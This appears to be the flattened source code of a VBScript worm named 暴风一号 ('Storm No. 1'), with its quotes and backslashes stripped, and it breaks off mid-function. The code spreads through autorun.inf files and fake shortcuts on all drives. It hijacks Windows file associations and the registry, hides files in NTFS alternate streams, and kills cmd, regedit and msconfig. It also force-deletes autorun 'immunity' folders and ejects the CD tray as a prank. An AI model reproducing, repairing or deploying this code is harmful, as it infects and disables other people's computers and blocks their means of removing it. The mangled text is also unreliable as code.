暴风一号源码.doc

on error resume nextdim fso,wshshellset fso=createobject(scripting.filesystemobject)set wshshell=createobject(wscript.shell)call main()sub main()on error resume nextdim args, virusload, virusassset args=wscript.argumentsvirusload=getmainvirus(1)virusass=getmainvirus(0)argnum=0do while argnum 0 and month(date) = day(date) then call virusalert() call makejoke(cint(month(date) end if call monitorsystem()end selectend subsub monitorsystem()on error resume next:dim processnames, exefullnamesprocessnames=array(cmd.exe,,regedit.exe,regedit.scr,regedit.pif,,msconfig.exe)vbsfullnames=array(getmainvirus(1)do call killprocess(processnames) call invadesystem(getmainvirus(1),getmainvirus(0) call keepprocess(vbsfullnames) wscript.sleep 3000loopend subsub invadesystem(virusloadpath,virusasspath)on error resume nextdim load_value, file_value, ie_value, mycpt_value1, mycpt_value2, hcuload, hcuver, viruscode, versionload_value=&virusloadpath&file_value=%systemroot%system32wscript.exe &virusasspath& %1 %* ie_value=%systemroot%system32wscript.exe &virusasspath& oie mycpt_value1=%systemroot%system32wscript.exe &virusasspath& omc mycpt_value2=%systemroot%system32wscript.exe &virusasspath& emc hcuload=hkey_current_usersoftwaremicrosoftwindows ntcurrentversionwindowsloadhcuver=hkey_current_usersoftwaremicrosoftwindows ntcurrentversionwindowsverhcudate=hkey_current_usersoftwaremicrosoftwindows ntcurrentversionwindowsdateviruscode=getcode(wscript.scriptfullname)version=1hostsourcepath=fso.getspecialfolder(1)&wscript.exehostfilepath=fso.getspecialfolder(0)&systemsvchost.exefor each drive in fso.drives if drive.isready and (drive.drivetype=1 or drive.drivetype=2 or drive.drivetype=3) then diskvirusname=getserialnumber(drive.driveletter)&.vbs call createautorun(drive.driveletter,diskvirusname) call infectroot(drive.driveletter,diskvirusname) end ifnextif fso.fileexists(virusasspath)=false or fso.fileexists(virusloadpath)=false or fso.fileexists(hostfilepath)=false or getversion() version then if getfilesystemtype(getsystemdrive()=ntfs then call createfile(viruscode,virusasspath) call createfile(viruscode,virusloadpath) call copyfile(hostsourcepath,hostfilepath) call sethiddenattr(hostfilepath) else call createfile(viruscode, virusasspath) call sethiddenattr(virusasspath) call createfile(viruscode,virusloadpath) call sethiddenattr(virusloadpath) call copyfile(hostsourcepath, hostfilepath) call sethiddenattr(hostfilepath) end ifend ifif readreg(hcuload)load_value then call writereg (hcuload, load_value, )end ifif getversion() version then call writereg (hcuver, version, )end ifif getinfecteddate() = then call writereg (hcudate, date, )end ifif readreg(hkey_local_machinesoftwareclassestxtfileshellopencommand)file_value then call settxtfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassesinifileshellopencommand)file_value then call setinifileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassesinffileshellopencommand)file_value then call setinffileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassesbatfileshellopencommand)file_value then call setbatfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassescmdfileshellopencommand)file_value then call setcmdfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassesregfileshellopencommand)file_value then call setregfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclasseschm.fileshellopencommand)file_value then call setchmfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclasseshlpfileshellopencommand)file_value then call sethlpfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassesapplicationsiexplore.exeshellopencommand)ie_value then call setieass(virusasspath)end ifif readreg(hkey_classes_rootclsid871c5380-42a0-1069-a2ea-08002b30309dshellopenhomepagecommand)ie_value then call setieass(virusasspath)end ifif readreg(hkey_classes_rootclsid20d04fe0-3aea-1069-a2d8-08002b30309dshellopencommand)mycpt_value1 then all setmycomputerass(virusasspath)end ifif readreg(hkey_classes_rootclsid20d04fe0-3aea-1069-a2d8-08002b30309dshellexplorecommand)mycpt_value2 then call setmycomputerass(virusasspath)end ifcall regset()end subsub copyfile(source, pathf)on error resume nextif fso.fileexists(pathf) then fso.deletefile pathf , trueend iffso.copyfile source, pathfend subsub createfile(code, pathf)on error resume nextdim filetextif fso.fileexists(pathf) then set filetext=fso.opentextfile(pathf, 2, false) filetext.write code filetext.closeelse set filetext=fso.opentextfile(pathf, 2, true) filetext.write code filetext.closeend ifend subsub createfile(code, pathf)on error resume nextdim filetextif fso.fileexists(pathf) then set filetext=fso.opentextfile(pathf, 2, false) filetext.write code filetext.closeelse set filetext=fso.opentextfile(pathf, 2, true) filetext.write code filetext.closeend ifend subsub regset()on error resume next dim regpath1 , regpath2, regpath3, regpath4regpath1=hkey_local_machinesoftwaremicrosoftwindowscurrentversionexploreradvancedfolderhiddennohiddencheckedvalueregpath2=hkey_local_machinesoftwaremicrosoftwindowscurrentversionexploreradvancedfolderhiddenshowallcheckedvalueregpath3=hkey_current_usersoftwaremicrosoftwindowscurrentversionpoliciesexplorernodrivetypeautorunregpath4=hkey_classes_rootlnkfileisshortcutcall writereg (regpath1, 3, reg_dword)call writereg (regpath2, 2, reg_dword)call writereg (regpath3, 0, reg_dword)call deletereg (regpath4)end subsub killprocess(processnames)on error resume nextset wmiservice=getobject(winmgmts:.rootcimv2)for each processname in processnames set processlist=wmiservice.execquery( select * from win32_process where name =&processname& ) for each process in processlist intreturn=process.terminate if intreturn0 then wshshell.run cmd /c ntsd -c q -p &process.handle, vbhide, false end if nextnextend subsub killimmunity(d)on error resume nextimmunityfolder=d&:autorun.infif fso.folderexists(immunityfolder) then wshshell.run (cmd /c cacls & &immunityfolder& & /t /e /c /g everyone:f),vbhide,true wshshell.run (cmd /c rd /s /q & immunityfolder), vbhide, trueend ifend subsub keepprocess(vbsfullnames)on error resume nextfor each vbsfullname in vbsfullnames if vbsprocesscount(vbsfullname) 2 then run(%systemroot%systemsvchost.exe &vbsfullname) end ifnextend subsub writereg(strkey, value, vtype)dim tmpsset tmps=createobject(wscript.shell)if vtype= then tmps.regwrite strkey, valueelse tmps.regwrite strkey, value, vtypeend ifset tmps=nothingend subsub deletereg(strkey)dim tmpsset tmps=createobject(wscript.shell)tmps.regdelete strkeyset tmps=nothingend subsub sethiddenattr(path)on error resume nextdim vfset vf=fso.getfile(path)set vf=fso.getfolder(path)vf.attributes=6end subsub run(exefullname)on error resume nextdim wshshellset wshshell=wscript.createobject(wscript.shell)wshshell.run exefullnameset wshshell=nothingend subsub infectroot(d,virusname)on error resume nextdim vbscodevbscode=getcode(wscript.scriptfullname)vbspath=d&:&virusnameif fso.fileexists(vbspath)=false then call createfile(vbscode, vbspath) call sethiddenattr(vbspath)end ifset folder=fso.getfolder(d&:)set subfolders=folder.subfoldersfor each subfolder in subfolders sethiddenattr(subfolder.path) lnkpath=d&:&&.lnk targetpath=d&:&virusname args=&d&:&& dir if fso.fileexists(lnkpath)=false or gettargetpath(lnkpath) targetpath then if fso.fileexists(lnkpath)=true then fso.deletefile lnkpath, true end if call createshortcut(lnkpath,targetpath,args) end ifnextend subsub createshortcut(lnkpath,targetpath,args)set shortcut=wshshell.createshortcut(lnkpath)with shortcut .targetpath=targetpath .arguments=args .windowstyle=4 .iconlocation=%systemroot%system32shell32.dll, 3 .saveend withend subsub createautorun(d,virusname)on error resume nextdim infpath, vbspath, vbscodeinfpath=d&:autorun.infvbspath=d&:&virusnamevbscode=getcode(wscript.scriptfullname)if fso.fileexists(infpath)=false or fso.fileexists(vbspath)=false then call createfile(vbscode, vbspath) call sethiddenattr(vbspath) strinf=autorun&vbcrlf&shellexecute=wscript.exe &virusname& autorun&vbcrlf&shellopen=(&o)&vbcrlf&shellopencommand=wscript.exe &virusname& autorun&vbcrlf&shellopendefault=1& vbcrlf&shellexplore=(&x)&vbcrlf&shellexplorecommand=wscript.exe &virusname& autorun call killimmunity(d) call createfile(strinf, infpath) call sethiddenattr(infpath)end ifend subsub settxtfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclassestxtfileshellopencommand, value, reg_expand_sz)end subsub setinifileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclassesinifileshellopencommand, value, reg_expand_sz)end subsub setinffileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclassesinffileshellopencommand, value, reg_expand_sz)end subsub setbatfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclassesbatfileshellopencommand, value, reg_expand_sz)end subsub setcmdfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclassescmdfileshellopencommand, value, reg_expand_sz)end subsub sethlpfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclasseshlpfileshellopencommand, value, reg_expand_sz)end subsub setregfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclassesregfileshellopencommand, value, reg_expand_sz)end subsub setchmfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclasseschm.fileshellopencommand, value, reg_expand_sz)end subsub setieass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& oie call writereg(hkey_local_machinesoftwareclassesapplicationsiexplore.exeshellopencommand, value, reg_expand_sz)call writereg(hkey_classes_rootclsid871c5380-42a0-1069-a2ea-08002b30309dshellopenhomepagecommand, value, reg_expand_sz)end subsub setmycomputerass(sfilepath)on error resume nextdim value1,value2value1=%systemroot%system32wscript.exe &sfilepath& omc value2=%systemroot%system32wscript.exe &sfilepath& emc call writereg(hkey_classes_rootclsid20d04fe0-3aea-1069-a2d8-08002b30309dshell, , reg_sz)call writereg(hkey_classes_rootclsid20d04fe0-3aea-1069-a2d8-08002b30309dshellopencommand, value1, reg_expand_sz)call writereg(hkey_classes_rootclsid20d04fe0-3aea-1069-a2d8-08002b30309dshellexplorecommand, value2, reg_expand_sz)end subsub virusalert()on error resume nextdim htapath,htacodehtapath=fso.getspecialfolder(1)&bfalert.htahtacode=&vbcrlf&vbcrlf&vbcrlf&n&vbcrlf&vbcrlf&if fso.fileexists(htapath)=false then call createfile(htacode, htapath) call sethiddenattr(htapath)end ifcall run(htapath)end subsub makejoke(times)on error resume nextdim wmp, colcdromsset wmp = createobject( wmplayer.ocx )set colcdroms = wmp.cdromcollectionif colcdroms.count 0 then for i=1 to times colcdroms.item(0).eject() wscript.sleep 3000 colcdroms.item(0).eject() nextend ifset wmp = nothingend subfunction getserialnumber(drv)on error resume nextset d=fso.getdrive(drv)getserialnumber=d.serialnumbergetserialnumber=replace(getserialnumber,-,)end functionfunction getmainvirus(n)on error resume nextmainvirusname=getserialnumber(getsystemdrive()&.vbsif getfilesystemtype(getsystemdrive()=ntfs then if n=1 then getmainvirus=fso.getspecialfolder(n)&smss.exe:&mainvirusname end if if n=0 then getmainvirus=fso.getspecialfolder(n)&explorer.exe:&mainvirusname end ifelse getmainvirus=fso.getspecialfolder(n)&mainvirusnameend ifend functionfunction vbsprocesscount(vbspath)on error resume nextdim wmiservice, processlist, processvbsprocesscount=0set wmiservice=getobject(winmgmts:.rootcimv2)set processlist=wmiservice.execquery(select * from win32_process where &name=cscript.exe or name=ws